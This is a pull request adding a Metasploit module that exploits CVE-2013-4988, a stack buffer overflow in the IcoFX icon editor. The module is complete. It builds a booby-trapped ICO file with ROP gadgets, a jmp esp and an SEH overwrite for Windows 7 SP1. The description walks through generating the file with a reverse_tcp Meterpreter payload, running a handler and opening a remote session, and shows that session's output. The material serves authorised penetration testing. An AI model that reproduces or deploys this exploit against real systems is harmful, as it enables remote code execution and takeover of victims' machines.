### PR TITLE
Add module for CVE-2013-4988

### DIFF
--- a/modules/exploits/windows/fileformat/icofx_bof.rb
+++ b/modules/exploits/windows/fileformat/icofx_bof.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'IcoFX Stack Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability in version 2.1
+        of IcoFX. The vulnerability exists while parsing .ICO files, where an specially
+        crafted ICONDIR header, providing an arbitrary long number of images into the file,
+        can be used to trigger the overflow when reading the ICONDIRENTRY structures.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Marcos Accossatto', # Vulnerability discovery, poc
+          'juan vazquez' # Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-4988' ],
+          [ 'OSVDB', '100826' ],
+          [ 'BID', '64221' ],
+          [ 'EDB', '30208'],
+          [ 'URL', 'http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability' ]
+        ],
+      'Platform'          => [ 'win' ],
+      'Payload'           =>
+        {
+          'DisableNops'    => true,
+          'Space'          => 864,
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+        },
+      'Targets'        =>
+        [
+          [ 'IcoFX 2.5 / Windows 7 SP1',
+            {
+              :callback => :target_win7,
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Feb 12 2011',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ico'])
+      ], self.class)
+
+  end
+
+  def target_win7
+    # All the gadgets com from IcoFX2.exe 2.5.0.0
+
+    # ICONDIR structure
+    ico =  [0].pack("v") # Reserved. Must always be 0
+    ico << [1].pack("v") # Image type: 1 for icon (.ico) image
+    # 0x66 is enough to overwrite the local variables and, finally
+    # the seh handler. 0x7f00 is used to trigger an exception after
+    # the overflow, while the overwritten SEH handler is in use.
+    ico << [0x7f00].pack("v")
+    # ICONDIRENTRY structures 102 structures are using to overwrite
+    # every structure = 16 bytes
+    # 100 structures are used to reach the local variables
+    ico << "A" * 652
+    ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods
+    ico << [0x0045cc21].pack("V")      # jmp esp
+    ico << payload.encoded
+    ico << "B" * (
+      1600 -                 # 1600 = 16 ICONDIRENTRY struct size * 100
+      652 -                  # padding
+      80 -                   # rop nops size
+      4 -                    # jmp esp pointer size
+      payload.encoded.length
+    )
+    # The next ICONDIRENTRY allows to overwrite the interesting local variables
+    # on the stack
+    ico << [2].pack("V")          # Counter (remaining bytes) saved on the stack
+    ico << "A" * 8                # Padding
+    ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler
+    # The next ICONDIRENTRY allows to overwrite the seh handler
+    ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret
+    ico << "B" * (0xc) # padding
+    return ico
+  end
+
+  def exploit
+    unless self.respond_to?(target[:callback])
+      fail_with(Failure::BadConfig, "Invalid target specified: no callback function defined")
+    end
+
+    ico = self.send(target[:callback])
+
+    print_status("Creating '#{datastore['FILENAME']}' file...")
+    file_create(ico)
+  end
+
+end

--- a/modules/exploits/windows/fileformat/icofx_bof.rb
+++ b/modules/exploits/windows/fileformat/icofx_bof.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ],
         ],
-      'DisclosureDate' => 'Feb 12 2011',
+      'DisclosureDate' => 'Dec 10 2013',
       'DefaultTarget'  => 0))
 
     register_options(


### PR DESCRIPTION
Tested on Win 7 SP1 with IcoFX 2.5
## Verification
- [ ] Install Win 7 SP1
- [ ] Install IcoFX 2.5 trial from the home page http://icofx.ro/downloads.html At the time of writing the trial is vulnerable. If it isn't at the time of testing ask me for the installer.

```
 Version: 2.5 
 Release Date: June 3, 2013 
 MD5: 8D7EA68B8857995FEB646DA673E7177E
```
- [ ] run msfconsole
- [ ] use exploit/windows/fileformat/icofx_bof
- [ ] exploit to generate an ICO file with the payload

```
msf exploit(icofx_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(icofx_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(icofx_bof) > rexploit
[*] Reloading module...

[*] Creating 'msf.ico' file...
[+] msf.ico stored at /Users/juan/.msf4/local/msf.ico
```
- [ ] run the handler on the msfconsole for the same payload

```
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
```
- [ ] Open the ico file on the vulnerable Win7SP1 machine. It should support both context menu, file-open, drag and drop opening methods.
- [ ] Hopefully  enjoy sessions. If for any reason you experience a crash but a session, a windbg crashdump would be super useful for me to debug. I experienced crashes when opening the file with different methods. Hopefully it is reliable enough (remember, **only has been tested on Win7 SP1**)

```
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.134
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.134:50123) at 2013-12-31 14:40:32 -0600

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
smeterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
```
